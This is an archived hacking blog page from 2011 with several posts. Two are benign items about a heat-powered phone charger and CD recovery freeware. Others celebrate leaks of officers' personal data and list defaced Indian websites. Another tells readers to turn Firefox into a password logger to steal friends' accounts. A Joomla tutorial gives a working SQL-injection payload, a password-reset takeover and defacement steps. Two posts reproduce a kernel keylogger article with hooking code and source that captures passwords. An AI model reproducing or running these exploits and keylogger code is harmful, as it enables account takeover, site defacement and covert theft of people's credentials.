Sunday, 31 July 2011

This Mobile Phone Charger Needs No Electricity

usb mobile charger
Here’s a device that could be useful to millions of households in India and elsewhere who have mobile phones but sometimes not get enough electricity to charge their phones.
TES NewEnergy, a company based in Japan, has created a new USB based charger that can charge your mobile phone without requiring electricity – all it needs is a heat source which could be as simple as a pan of boiling water or even a campfire.
The device, known as Pan Charger, converts heat into electric energy and that can charge any cellphone, MP3 player or other mobile device over a USB connection in 3-5 hours. The tech specs say that the USB connection also has a built-in radio and a lantern – things that you often need when there’s no power.

Pan Charger is already available for purchase in Japan according to an AFP report but, at $299 a unit, it is not a very affordable option. That could however change as the company does have plans to introduce the device in other developing countries.
Pan Charger isn’t the only device that can charge mobile phones without a power outlet. There’s Yogen, a hand-powered charger that works like a Yo-yo. You attach the cell phone to Yogen over USB and pull/release the cord for a few minutes to charge the phone.
The best idea however comes from Kenya. They have turned a bicycle into a mobile phone charger – ride your bike for a few kilometers, which most villagers do anyway, and your phone is charged.


Watch The Vedio :-







Get Free Updates:
*Please click on the confirmation link sent in your Spam folder of Email*
read more

7000 Law enforcement officers details leaked by Anonymous Hackers

AntiSec and Anonymous Hackers announced via Twitter that they absconded with up to 10 Giga Bytes of confidential information, including protected witnesses. They have posted more than 7,000 law enforcement officials’ private information online including: their social security numbers; email accounts and passwords; phone numbers and home addresses on Pastebin.

Also Today 77 Law Enforcement websites hit in mass attack by #Antisec Anonymous.
Get Free Updates:
*Please click on the confirmation link sent in your Spam folder of Email*
read more

ZCompany Pakistani Hackers deface Big Indian Websites !

Pakistani Hackers - ZCompany Hacking Crew again hit some big Indian Websites and Deface them.

Hacked Sites:
Indian Testing Board (ITB) is the International Software Testing Qualifications Board (ISTQB) :http://www.istqb.in/
http://payment.istqb.in/

Alpha Capital provides Multi Family Office ,Management , Private Wealth Management , Family Office ,
Private Banking , Financial Advisor
http://alphacapital.in/

Asia's Largest Collection of Antique Carpets in Delhi and India.
http://antiquecarpet.in/
http://www.bookswagon.com/

Indian National Science Academy, INSA, National Science, Indian Science, Fellowship, FNA, international Science
http://insaindia.org/index.php
http://www.indiapedia.org/

CPAI endeavors to put forth new & innovative ideas for smooth functioning and the growth of the commodity market operations
http://commoindia.com/

Department of Financial Studies : University of Delhi, South Campus Offers a masters program in finance and control. Information about the department, programs, admissions, faculty, alumni and placements.
http://mfc.edu/

More Hacked Sites :
http://ct.asiaticstock.in/
http://depository.in/
http://down.adroitfinancial.com/
http://cnotes.universalstockbrokers.com/
http://cosmosbags.com/
http://earthcarefilms.com/
http://exporterindia.com/
http://www.ezygallery.com/
http://flourishfincap.com/
http://myteamkit.net/
http://naventerprise.com/
http://online.kassa.in/
http://vedamtech.com/
http://optionfin.com/
http://mahaveerbroking.com/
http://johnjastremski.com/
http://file.adroitfinancial.com/
http://ic.depository.in/
http://www.leo8films.com/

Mirror of All hacked sites :
http://zone-h.org/mirror/id/14512456
http://zone-h.org/mirror/id/14512558
http://zone-h.org/mirror/id/14512554
http://mirror.sec-t.net/defacements/?id=54719
http://zone-h.org/mirror/id/14513675
http://zone-h.org/mirror/id/14513677
http://zone-h.org/mirror/id/14513678
http://zone-h.org/mirror/id/14513679
http://zone-h.org/mirror/id/14513680
http://zone-h.org/mirror/id/14513681
http://zone-h.org/mirror/id/14513682
http://zone-h.org/mirror/id/14513683
http://zone-h.org/mirror/id/14513684
http://www.zone-ar.com/attackmirror/mirror.php?id=167615
http://www.zone-ar.com/attackmirror/mirror.php?id=167614
http://zone-h.org/mirror/id/14513685
http://zone-h.org/mirror/id/14514439
http://zone-h.org/mirror/id/14514440
http://zone-h.org/mirror/id/14514441
http://zone-h.org/mirror/id/14514442
http://zone-h.org/mirror/id/14514443
http://zone-h.org/mirror/id/14514444
http://zone-h.org/mirror/id/14514445
http://zone-h.org/mirror/id/14514446
Get Free Updates:
*Please click on the confirmation link sent in your Spam folder of Email*
read more

Saturday, 30 July 2011

Deparment of Homeland Security Emails Leaked by #Antisec Anonymous

One of the Anonymous - @AnonWorldUnite  leaked the DHS emails on internet. He tweeted that
A Wild Leak Has Appeared! : http://wp.me/p1JyTn-f #AntiSec #AnonOps #Leak #LulzSec #Anonymous  http://wp.me/p1JyTn-f

The link given in the Twitter post is a link to a WordPress Blog. on the blog post
You Asked – And You Shall Recieve #DHS Emails – *all emails and files were obtained legally. -
http://www.mediafire.com/?zidv26ppown4u0s


The article shows a Mediafire link download link with a PDF file ogc ap redacted foia process 301 350.pdf (8.04 MB) , in which the e-mails details are exposed at there.



As Anonymous Said that, They got this File in Legal Way, We try to find out and Get that this PDF is available on the DHS site at http://www.dhs.gov/xlibrary/assets/foia/ogc_ap_redacted_foia_process_301-350.pdf and http://www.dhs.gov/xlibrary/assets/foia/ogc_ap_redacted_foia_process_651-700.pdf

Its Easy to find such File using Google Dork: site:dhs.gov/xlibrary filetype:pdf foia . Thats why this should be consider as any Leak. This may be Developers mistake that they DHS allow bots to index such information on search Engines.
Get Free Updates:
*Please click on the confirmation link sent in your Spam folder of Email*
read more

How to Recover Data From Your OLD or Scrached CD !

Hi Friends when you look at your collection of old cd's you find that almost all of them have some scratches all over it and most of them have become unreadable. :) Am i Right ?
You might want to copy some data out of it but Your PC is unable to read from the CD.

SO HERE IS A TOOL FOR ALL MY READERS !
CD Recovery Toolbox supports almost all kind of disks like CD, DVD, HD-DVD, Blu-ray disks etc. This tool actually works when it comes to recovering data from physically damaged CDs. So if you have any damaged CD or DVD and want to recover some data from it give this a try and I am sure you will like it............leave your comments

DOWNLOAD IT BELOW !
CLICK HERE
It’s a Freeware and small in size. This tool allows you to copy the part which is not damaged. So if you are copying some song which is not readable this software can copy the song but the unreadable part will be missing.
This can be useful because in Windows even if some small part is unreadable it will not allow you to copy the whole file.
So enjoy Copying your Damaged CD'S
Get Free Updates:
*Please click on the confirmation link sent in your Spam folder of Email*
read more

Turning Firefox Into Keylogger Without Any Software !

Ever wanted to hack your friends accounts, whenever there were over your house or who evers! Or you just wanted firefox to save all your passwords without prompting you every single time! This is for you, read on!

1. Locate nsLoginManagerPrompter.js file (Default location C:\Program Files\Mozilla Firefox\components).
2. Open the file with word pad or notepad!
3. Press Ctrl + A on keyboard, and then press del or delete!
4. Copy and Paste all this:
 
http://tinypaste.com/99d583
5. Make sure Firefox is closed and save the file!

6. Your Done!

-------------

From now on, when ever someone logs onto any site, they username and password will be save automatically without prompt!

To retrieve the account information: Make sure firefox is opened, go to Tools <>
Get Free Updates:
*Please click on the confirmation link sent in your Spam folder of Email*
read more

How to Hack Joomla - NFN (Not for Noobs)

Tools required:
SQL-i Knowledge
reiluke SQLiHelper 2.7
Joomla! Query Knowledge

DISCLAIMER:
THIS TUTORIAL IS FOR EDUCATION PURPOSE ONLY!!! YOU MAY NOT READ THIS TUTORIAL IF YOU DON'T UNDERSTAND AND AGREE TO THIS DISCLAIMER. ME AS AUTHOR OF THIS TUTORIAL NOT BE HELD RESPONSIBLE FOR THE MISUSE OF THE INFORMATION CONTAINED WITHIN THIS TUTORIAL. IF YOU ABUSE THIS TUTORIAL FOR ILLEGAL PURPOSES I WILL NOT BE HELD RESPONSIBLE FOR ANY ACTION THAT MAY BE TAKEN AGAINST YOU AS A RESULT OF YOUR MISUSE.


NOTE:
USE ANONYMOUS PROXY!!!


Introduction


Joomla! as Stable-Full Package is probably unhackable and If someone tells that HACKED Joomla, talking rubbish!!!
But people still hacked sites that use Joomla as Content Management System?!?
Joomla is made of components and modules and there are some developers apart from official team that offer their solutions to improve Joomla. That components and modules mede by that other developers are weak spots!



I hacked site that use Joomla! v1.5.6 and after that v1.5.9 through IDoBlog v1.1, but I can't tell that I hacked Joomla!


Finding Exploit And Target


Those two steps could go in different order, depend what you find first target or exploit...



Google dork: inurl:"option=com_idoblog"
Comes up with results for about 140,000 pages (may change)


[Image: 001cv.png]



At inj3ct0r.com search for: com_idoblog
Give us back Joomla Component idoblog 1.1b30 (com_idoblog) SQL Injection Vuln



[Image: 002rg.png]



==
Joomla Component idoblog 1.1b30 (com_idoblog) SQL Injection Vuln
==



index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10, ​11,12,13,14,15,16+from+jos_users--



Exploit can be separated in two parts:



Part I
index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62
This part opening blog Admin page and if Admin page don't exist, exploit won't worked (not completely confirmed)



Part II
+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,1​5,16+from+jos_users--
This part looking for username and password from jos_users table


Testing Vulnerability


Disable images for faster page loading:
[Firefox]
Tools >> Options >> Content (tab menu) >> and unclick 'Load images automatically'



Go to:

Code:
http://www.site.com/index.php?option=com_idoblog&view=idoblog&Itemid=22

Site load normally...



Go to:

Code:
http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62

Site content blog Profile Admin



Go to:

Code:
http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1--

Site is vulnerable


Inject Target


Open reiluke SQLiHelper 2.7
In Target copy

Code:
http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62

and click on Inject
Follow standard steps until you find Column Name, as a result we have



[Image: 003bd.png]



Notice that exploit from inj3ct0r wouldn't work here because it looking for jos_users table and as you can see
our target use jos153_users table for storing data



Let Dump username, email, password from Column Name jos153_users. Click on Dump Now



[Image: 004k.png]



username: admin
email: info@site.com
password: 169fad83bb2ac775bbaef4938d504f4e:mlqMfY0Vc9KLxPk056eewFWM13vEThJI



Joomla! 1.5.x uses md5 to hash the passwords. When the passwords are created, they are hashed with a
32 character salt that is appended to the end of the password string. The password is stored as
{TOTAL HASH}:{ORIGINAL SALT}. So to hack that password take time and time...



The easiest way to hack is to reset Admin password!


Admin Password Reset


Go to:

Code:
http://www.site.com/index.php?option=com_user&view=reset

This is standard Joomla! query for password reset request



[Image: 005hy.png]



Forgot your Password? page will load.
In E-mail Address: enter admin email (in our case it is:info@site.com) and press Submit.
If you find right admin email, Confirm your account. page will load, asking for Token:


Finding Token


To find token go back to reiluke SQLiHelper 2.7 and dump username and activation from Column Name jos153_users



[Image: 006fj.png]



username: admin
activation: 5482dd177624761a290224270fa55f1d



5482dd177624761a290224270fa55f1d is 32 char verification token, enter it and pres Submit.



[Image: 007pa.png]



If you done everything ok, Rest your Password page will load. Enter your new password...



After that go to:

Code:
http://www.site.com/administrator/

Standard Joomla portal content management system



Enter username admin and your password, click on Login
Go to Extensions >> Template Manager >> Default Template Name >> Edit HTML
In Template HTML Editor insert your defaced code, click Apply, Save and you are done!!!



[Image: 008bo.png]



To make admin life more miserable, click on admin in main Joomla window and in User Details page change admin E-mail



[Image: 009kw.png]
Get Free Updates:
*Please click on the confirmation link sent in your Spam folder of Email*
read more

Friday, 29 July 2011

How To Write A Keylogger For Linux (Explained) Post 2

----[ 4.1 - The syscall/tty approach

To logging both local (logged from console) and remote sessions, I chose
the method of intercepting receive_buf() function (see 3.2.3).

In the kernel, tty_struct and tty_queue structures are dynamically
allocated only when the tty is open. Thus, we also have to intercept
sys_open syscall to dynamically hooking the receive_buf() function of each
tty or pty when it's invoked.

// to intercept open syscall
original_sys_open = sys_call_table[__NR_open];
sys_call_table[__NR_open] = new_sys_open;

// new_sys_open()
asmlinkage int new_sys_open(const char *filename, int flags, int mode)
{
...
// call the original_sys_open
ret = (*original_sys_open)(filename, flags, mode);
if (ret >= 0) {
struct tty_struct * tty;
...
file = fget(ret);
tty = file->private_data;
if (tty != NULL &&
...
tty->ldisc.receive_buf != new_receive_buf) {
...
// save the old receive_buf
old_receive_buf = tty->ldisc.receive_buf;
...

/*
* init to intercept receive_buf of this tty
* tty->ldisc.receive_buf = new_receive_buf;
*/
init_tty(tty, TTY_INDEX(tty));
}
...
}

// our new receive_buf() function
void new_receive_buf(struct tty_struct *tty, const unsigned char *cp,
char *fp, int count)
{
if (!tty->real_raw && !tty->raw) // ignore raw mode
// call our logging function to log user inputs
vlogger_process(tty, cp, count);
// call the original receive_buf
(*old_receive_buf)(tty, cp, fp, count);
}


----[ 4.2 - Features

- Logs both local and remote sessions (via tty & pts)

- Separate logging for each tty/session. Each tty has their own logging
buffer.

- Nearly support all special chars such as arrow keys (left, right, up,
down), F1 to F12, Shift+F1 to Shift+F12, Tab, Insert, Delete, End,
Home, Page Up, Page Down, BackSpace, ...

- Support some line editing keys included CTRL-U and BackSpace.

- Timestamps logging, timezone supported (ripped off some codes from
libc).

- Multiple logging modes

o dumb mode: logs all keystrokes

o smart mode: detects password prompt automatically to log
user/password only. I used the similar technique presented in
"Passive Analysis of SSH (Secure Shell) Traffic" paper by Solar
Designer and Dug Song (see [6]). When the application turns input
echoing off, we assume that it is for entering a password.

o normal mode: disable logging

You can switch between logging modes by using a magic password.

#define VK_TOGLE_CHAR 29 // CTRL-]
#define MAGIC_PASS "31337" // to switch mode, type MAGIC_PASS
// then press VK_TOGLE_CHAR key

----[ 4.3 - How to use

Change the following options

// directory to store log files
#define LOG_DIR "/tmp/log"

// your local timezone
#define TIMEZONE 7*60*60 // GMT+7

// your magic password
#define MAGIC_PASS "31337"

Below is how the log file looks like:

[root@localhost log]# ls -l
total 60
-rw------- 1 root root 633 Jun 19 20:59 pass.log
-rw------- 1 root root 37593 Jun 19 18:51 pts11
-rw------- 1 root root 56 Jun 19 19:00 pts20
-rw------- 1 root root 746 Jun 19 20:06 pts26
-rw------- 1 root root 116 Jun 19 19:57 pts29
-rw------- 1 root root 3219 Jun 19 21:30 tty1
-rw------- 1 root root 18028 Jun 19 20:54 tty2

---in dumb mode
[root@localhost log]# head tty2 // local session
<19/06/2002-20:53:47 uid=501 bash> pwd
<19/06/2002-20:53:51 uid=501 bash> uname -a
<19/06/2002-20:53:53 uid=501 bash> lsmod
<19/06/2002-20:53:56 uid=501 bash> pwd
<19/06/2002-20:54:05 uid=501 bash> cd /var/log
<19/06/2002-20:54:13 uid=501 bash> tail messages
<19/06/2002-20:54:21 uid=501 bash> cd ~
<19/06/2002-20:54:22 uid=501 bash> ls
<19/06/2002-20:54:29 uid=501 bash> tty
<19/06/2002-20:54:29 uid=501 bash> [UP]

[root@localhost log]# tail pts11 // remote session
<19/06/2002-18:48:27 uid=0 bash> cd new
<19/06/2002-18:48:28 uid=0 bash> cp -p ~/code .
<19/06/2002-18:48:21 uid=0 bash> lsmod
<19/06/2002-18:48:27 uid=0 bash> cd /va[TAB][^H][^H]tmp/log/
<19/06/2002-18:48:28 uid=0 bash> ls -l
<19/06/2002-18:48:30 uid=0 bash> tail pts11
<19/06/2002-18:48:38 uid=0 bash> [UP] | more
<19/06/2002-18:50:44 uid=0 bash> vi vlogertxt
<19/06/2002-18:50:48 uid=0 vi> :q
<19/06/2002-18:51:14 uid=0 bash> rmmod vlogger

---in smart mode
[root@localhost log]# cat pass.log
[19/06/2002-18:28:05 tty=pts/20 uid=501 sudo]
USER/CMD sudo traceroute yahoo.com
PASS 5hgt6d
PASS

[19/06/2002-19:59:15 tty=pts/26 uid=0 ssh]
USER/CMD ssh guest@host.com
PASS guest

[19/06/2002-20:50:44 tty=pts/29 uid=504 ftp]
USER/CMD open ftp.ilog.fr
USER Anonymous
PASS heh@heh

[19/06/2002-20:59:54 tty=pts/29 uid=504 su]
USER/CMD su -
PASS asdf1234


Please check http://www.thehackerschoice.com/ for update on the new version
of this tool.


--[ 5 - Greets

Thanks to plasmoid, skyper for your very useful comments
Greets to THC, vnsecurity and all friends
Finally, thanks to mr. thang for english corrections


--[ 6 - References

[1] Linux Kernel Module Programming
http://www.tldp.org/LDP/lkmpg/
[2] Complete Linux Loadable Kernel Modules - Pragmatic
http://www.thehackerschoice.com/papers/LKM_HACKING.html
[3] The Linux keyboard driver - Andries Brouwer
http://www.linuxjournal.com/lj-issues/issue14/1080.html
[4] Abuse of the Linux Kernel for Fun and Profit - Halflife
http://www.phrack.com/phrack/50/P50-05
[5] Kernel function hijacking - Silvio Cesare
http://www.big.net.au/~silvio/kernel-hijack.txt
[6] Passive Analysis of SSH (Secure Shell) Traffic - Solar Designer
http://www.openwall.com/advisories/OW-003-ssh-traffic-analysis.txt
[7] Kernel Based Keylogger - Mercenary
http://packetstorm.decepticons.org/UNIX/security/kernel.keylogger.txt

--[ 7 - Keylogger sources

<++> vlogger/Makefile
#
# vlogger 1.0 by rd
#
# LOCAL_ONLY logging local session only. Doesn't intercept
# sys_open system call
# DEBUG Enable debug. Turn on this options will slow
# down your system
#

KERNELDIR =/usr/src/linux
include $(KERNELDIR)/.config
MODVERFILE = $(KERNELDIR)/include/linux/modversions.h

MODDEFS = -D__KERNEL__ -DMODULE -DMODVERSIONS
CFLAGS = -Wall -O2 -I$(KERNELDIR)/include -include $(MODVERFILE) \
-Wstrict-prototypes -fomit-frame-pointer -pipe \
-fno-strength-reduce -malign-loops=2 -malign-jumps=2 \
-malign-functions=2

all : vlogger.o

vlogger.o: vlogger.c
$(CC) $(CFLAGS) $(MODDEFS) -c $^ -o $@

clean:
rm -f *.o
<-->
<++> vlogger/vlogger.c
/*
* vlogger 1.0
*
* Copyright (C) 2002 rd
*
* Please check http://www.thehackerschoice.com/ for update
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version
*
* This program is distributed in the hope that it will be useful, but
* WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* General Public License for more details.
*
* Greets to THC & vnsecurity
*
*/

#define __KERNEL_SYSCALLS__
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#ifndef KERNEL_VERSION
#define KERNEL_VERSION(a,b,c) (((a) << 16) + ((b) << 8) + (c))
#endif

#if LINUX_VERSION_CODE >= KERNEL_VERSION(2,4,9)
MODULE_LICENSE("GPL");
MODULE_AUTHOR("rd@vnsecurity.net");
#endif

#define MODULE_NAME "vlogger "
#define MVERSION "vlogger 1.0 - by rd@vnsecurity.net\n"

#ifdef DEBUG
#define DPRINT(format, args...) printk(MODULE_NAME format, ##args)
#else
#define DPRINT(format, args...)
#endif

#define N_TTY_NAME "tty"
#define N_PTS_NAME "pts"
#define MAX_TTY_CON 8
#define MAX_PTS_CON 256
#define LOG_DIR "/tmp/log"
#define PASS_LOG LOG_DIR "/pass.log"

#define TIMEZONE 7*60*60 // GMT+7

#define ESC_CHAR 27
#define BACK_SPACE_CHAR1 127 // local
#define BACK_SPACE_CHAR2 8 // remote

#define VK_TOGLE_CHAR 29 // CTRL-]
#define MAGIC_PASS "31337" // to switch mode, press MAGIC_PASS and
// VK_TOGLE_CHAR

#define VK_NORMAL 0
#define VK_DUMBMODE 1
#define VK_SMARTMODE 2
#define DEFAULT_MODE VK_DUMBMODE

#define MAX_BUFFER 256
#define MAX_SPECIAL_CHAR_SZ 12

#define TTY_NUMBER(tty) MINOR((tty)->device) - (tty)->driver.minor_start \
+ (tty)->driver.name_base
#define TTY_INDEX(tty) tty->driver.type == \
TTY_DRIVER_TYPE_PTY?MAX_TTY_CON + \
TTY_NUMBER(tty):TTY_NUMBER(tty)
#define IS_PASSWD(tty) L_ICANON(tty) && !L_ECHO(tty)
#define TTY_WRITE(tty, buf, count) (*tty->driver.write)(tty, 0, \
buf, count)

#define TTY_NAME(tty) (tty->driver.type == \
TTY_DRIVER_TYPE_CONSOLE?N_TTY_NAME: \
tty->driver.type == TTY_DRIVER_TYPE_PTY && \
tty->driver.subtype == PTY_TYPE_SLAVE?N_PTS_NAME:"")

#define BEGIN_KMEM { mm_segment_t old_fs = get_fs(); set_fs(get_ds());
#define END_KMEM set_fs(old_fs); }

extern void *sys_call_table[];
int errno;

struct tlogger {
struct tty_struct *tty;
char buf[MAX_BUFFER + MAX_SPECIAL_CHAR_SZ];
int lastpos;
int status;
int pass;
};

struct tlogger *ttys[MAX_TTY_CON + MAX_PTS_CON] = { NULL };
void (*old_receive_buf)(struct tty_struct *, const unsigned char *,
char *, int);
asmlinkage int (*original_sys_open)(const char *, int, int);

int vlogger_mode = DEFAULT_MODE;

/* Prototypes */
static inline void init_tty(struct tty_struct *, int);

/*
static char *_tty_make_name(struct tty_struct *tty,
const char *name, char *buf)
{
int idx = (tty)?MINOR(tty->device) - tty->driver.minor_start:0;

if (!tty)
strcpy(buf, "NULL tty");
else
sprintf(buf, name,
idx + tty->driver.name_base);
return buf;
}

char *tty_name(struct tty_struct *tty, char *buf)
{
return _tty_make_name(tty, (tty)?tty->driver.name:NULL, buf);
}
*/

#define SECS_PER_HOUR (60 * 60)
#define SECS_PER_DAY (SECS_PER_HOUR * 24)
#define isleap(year) \
((year) % 4 == 0 && ((year) % 100 != 0 || (year) % 400 == 0))
#define DIV(a, b) ((a) / (b) - ((a) % (b) < 0))
#define LEAPS_THRU_END_OF(y) (DIV (y, 4) - DIV (y, 100) + DIV (y, 400))

struct vtm {
int tm_sec;
int tm_min;
int tm_hour;
int tm_mday;
int tm_mon;
int tm_year;
};


/*
* Convert from epoch to date
*/
int epoch2time (const time_t *t, long int offset, struct vtm *tp)
{
static const unsigned short int mon_yday[2][13] = {
/* Normal years. */
{ 0, 31, 59, 90, 120, 151, 181, 212, 243, 273, 304, 334, 365 },
/* Leap years. */
{ 0, 31, 60, 91, 121, 152, 182, 213, 244, 274, 305, 335, 366 }
};

long int days, rem, y;
const unsigned short int *ip;

days = *t / SECS_PER_DAY;
rem = *t % SECS_PER_DAY;
rem += offset;
while (rem < 0) {
rem += SECS_PER_DAY;
--days;
}
while (rem >= SECS_PER_DAY) {
rem -= SECS_PER_DAY;
++days;
}
tp->tm_hour = rem / SECS_PER_HOUR;
rem %= SECS_PER_HOUR;
tp->tm_min = rem / 60;
tp->tm_sec = rem % 60;
y = 1970;

while (days < 0 || days >= (isleap (y) ? 366 : 365)) {
long int yg = y + days / 365 - (days % 365 < 0);
days -= ((yg - y) * 365
+ LEAPS_THRU_END_OF (yg - 1)
- LEAPS_THRU_END_OF (y - 1));
y = yg;
}
tp->tm_year = y - 1900;
if (tp->tm_year != y - 1900)
return 0;
ip = mon_yday[isleap(y)];
for (y = 11; days < (long int) ip[y]; --y)
continue;
days -= ip[y];
tp->tm_mon = y;
tp->tm_mday = days + 1;
return 1;
}

Get Free Updates:
*Please click on the confirmation link sent in your Spam folder of Email*
read more

How To Write A Keylogger For Linux (Explained) Post 1

Blu3StR3Ak Hacker Welcome's You


|=-----------------=[ Writing Linux Kernel Keylogger ]=------------------=|



--[ 1 - Introduction

This article is divided into two parts. The first part of the paper
gives an overview on how the linux keyboard driver work, and discusses
methods that can be used to create a kernel based keylogger. This part
will be useful for those who want to write a kernel based keylogger, or to
write their own keyboard driver (for supporting input of non-supported
language in linux environment, ...) or to program taking advantage of many
features in the Linux keyboard driver.

The second part presents detail of vlogger, a smart kernel based linux
keylogger, and how to use it. Keylogger is a very interesting code being
used widely in honeypots, hacked systems, ... by white and black hats. As
most of us known, besides user space keyloggers (such as iob, uberkey,
unixkeylogger, ...), there are some kernel based keyloggers. The earliest
kernel based keylogger is linspy of halflife which was published in Phrack
50 (see [4]). And the recent kkeylogger is presented in 'Kernel Based
Keylogger' paper by mercenary (see [7]) that I found when was writing this
paper. The common method of those kernel based keyloggers using is to log
user keystrokes by intercepting sys_read or sys_write system call.
However, this approach is quite unstable and slowing down the whole system
noticeably because sys_read (or sys_write) is the generic read/write
function of the system; sys_read is called whenever a process wants to read
something from devices (such as keyboard, file, serial port, ...). In
vlogger, I used a better way to implement it that hijacks the tty buffer
processing function.

The reader is supposed to possess the knowledge on Linux Loadable Kernel
Module. Articles [1] and [2] are recommended to read before further
reading.


--[ 2 - How Linux keyboard driver work

Lets take a look at below figure to know how user inputs from console
keyboard are processed:

_____________ _________ _________
/ \ put_queue| |receive_buf| |tty_read
/handle_scancode\-------->|tty_queue|---------->|tty_ldisc|------->
\ / | | |buffer |
\_____________/ |_________| |_________|

_________ ____________
| |sys_read| |
--->|/dev/ttyX|------->|user process|
| | | |
|_________| |____________|


Figure 1

First, when you press a key on the keyboard, the keyboard will send
corresponding scancodes to keyboard driver. A single key press can produce
a sequence of up to six scancodes.

The handle_scancode() function in the keyboard driver parses the stream
of scancodes and converts it into a series of key press and key release
events called keycode by using a translation-table via kbd_translate()
function. Each key is provided with a unique keycode k in the range 1-127.
Pressing key k produces keycode k, while releasing it produces keycode
k+128.

For example, keycode of 'a' is 30. Pressing key 'a' produces keycode 30.
Releasing 'a' produces keycode 158 (128+30).

Next, keycodes are converted to key symbols by looking them up on the
appropriate keymap. This is a quite complex process. There are eight
possible modifiers (shift keys - Shift , AltGr, Control, Alt, ShiftL,
ShiftR, CtrlL and CtrlR), and the combination of currently active modifiers
and locks determines the keymap used.

After the above handling, the obtained characters are put into the raw
tty queue - tty_flip_buffer.

In the tty line discipline, receive_buf() function is called periodically
to get characters from tty_flip_buffer then put them into tty read queue.

When user process want to get user input, it calls read() function on
stdin of the process. sys_read() function will calls read() function
defined in file_operations structure (which is pointed to tty_read) of
corresponding tty (ex /dev/tty0) to read input characters and return to the
process.

The keyboard driver can be in one of 4 modes:
- scancode (RAW MODE): the application gets scancodes for input.
It is used by applications that implement their own keyboard
driver (ex: X11)

- keycode (MEDIUMRAW MODE): the application gets information on
which keys (identified by their keycodes) get pressed and
released.

- ASCII (XLATE MODE): the application effectively gets the
characters as defined by the keymap, using an 8-bit encoding.

- Unicode (UNICODE MODE): this mode only differs from the ASCII
mode by allowing the user to compose UTF8 unicode characters by
their decimal value, using Ascii_0 to Ascii_9, or their
hexadecimal (4-digit) value, using Hex_0 to Hex_9. A keymap can
be set up to produce UTF8 sequences (with a U+XXXX pseudo-symbol,
where each X is an hexadecimal digit).

Those modes influence what type of data that applications will get as
keyboard input. For more details on scancode, keycode and keymaps, please
read [3].


--[ 3 - Kernel based keylogger approaches

We can implement a kernel based keylogger in two ways by writing our own
keyboard interrupt handler or hijacking one of input processing functions.


----[ 3.1 - Interrupt handler

To log keystrokes, we will use our own keyboard interrupt handler. Under
Intel architectures, the IRQ of the keyboard controlled is IRQ 1. When
receives a keyboard interrupt, our own keyboard interrupt handler read the
scancode and keyboard status. Keyboard events can be read and written via
port 0x60(Keyboard data register) and 0x64(Keyboard status register).

/* below code is intel specific */
#define KEYBOARD_IRQ 1
#define KBD_STATUS_REG 0x64
#define KBD_CNTL_REG 0x64
#define KBD_DATA_REG 0x60

#define kbd_read_input() inb(KBD_DATA_REG)
#define kbd_read_status() inb(KBD_STATUS_REG)
#define kbd_write_output(val) outb(val, KBD_DATA_REG)
#define kbd_write_command(val) outb(val, KBD_CNTL_REG)

/* register our own IRQ handler */
request_irq(KEYBOARD_IRQ, my_keyboard_irq_handler, 0, "my keyboard", NULL);

In my_keyboard_irq_handler():
scancode = kbd_read_input();
key_status = kbd_read_status();
log_scancode(scancode);

This method is platform dependent. So it won't be portable among
platforms. And you have to be very careful with your interrupt handler if
you don't want to crash your box ;)


----[ 3.2 - Function hijacking

Based on the Figure 1, we can implement our keylogger to log user inputs
by hijacking one of handle_scancode(), put_queue(), receive_buf(),
tty_read() and sys_read() functions. Note that we can't intercept
tty_insert_flip_char() function because it is an INLINE function.


------[ 3.2.1 - handle_scancode

This is the entry function of the keyboard driver (see keyboard.c). It
handles scancodes which are received from keyboard.

# /usr/src/linux/drives/char/keyboard.c
void handle_scancode(unsigned char scancode, int down);

We can replace original handle_scancode() function with our own to logs
all scancodes. But handle_scancode() function is not a global and exported
function. So to do this, we can use kernel function hijacking technique
introduced by Silvio (see [5]).

/* below is a code snippet written by Plasmoid */
static struct semaphore hs_sem, log_sem;
static int logging=1;

#define CODESIZE 7
static char hs_code[CODESIZE];
static char hs_jump[CODESIZE] =
"\xb8\x00\x00\x00\x00" /* movl $0,%eax */
"\xff\xe0" /* jmp *%eax */
;

void (*handle_scancode) (unsigned char, int) =
(void (*)(unsigned char, int)) HS_ADDRESS;

void _handle_scancode(unsigned char scancode, int keydown)
{
if (logging && keydown)
log_scancode(scancode, LOGFILE);
/*
* Restore first bytes of the original handle_scancode code. Call
* the restored function and re-restore the jump code. Code is
* protected by semaphore hs_sem, we only want one CPU in here at a
* time.
*/
down(&hs_sem);
memcpy(handle_scancode, hs_code, CODESIZE);
handle_scancode(scancode, keydown);
memcpy(handle_scancode, hs_jump, CODESIZE);
up(&hs_sem);
}

HS_ADDRESS is set by the Makefile executing this command
HS_ADDRESS=0x$(word 1,$(shell ksyms -a | grep handle_scancode))

Similar to method presented in 3.1, the advantage of this method is the
ability to log keystrokes under X and the console, no matter if a tty is
invoked or not. And you will know exactly what key is pressed on the
keyboard (including special keys such as Control, Alt, Shift, Print Screen,
...). But this method is platform dependent and won't be portable among
platforms. This method also can't log keystroke of remote sessions and is
quite complex for building an advance logger.


------[ 3.2.2 - put_queue

This function is called by handle_scancode() function to put characters
into tty_queue.

# /usr/src/linux/drives/char/keyboard.c
void put_queue(int ch);
To intercept this function, we can use the above technique as in section
(3.2.1).


------[ 3.2.3 - receive_buf

receive_buf() function is called by the low-level tty driver to send
characters received by the hardware to the line discipline for processing.

# /usr/src/linux/drivers/char/n_tty.c */
static void n_tty_receive_buf(struct tty_struct *tty, const
unsigned char *cp, char *fp, int count)

cp is a pointer to the buffer of input character received by the device.
fp is a pointer to a pointer of flag bytes which indicate whether a
character was received with a parity error, etc.

Lets take a deeper look into tty structures

# /usr/include/linux/tty.h
struct tty_struct {
int magic;
struct tty_driver driver;
struct tty_ldisc ldisc;
struct termios *termios, *termios_locked;
...
}

# /usr/include/linux/tty_ldisc.h
struct tty_ldisc {
int magic;
char *name;
...
void (*receive_buf)(struct tty_struct *,
const unsigned char *cp, char *fp, int count);
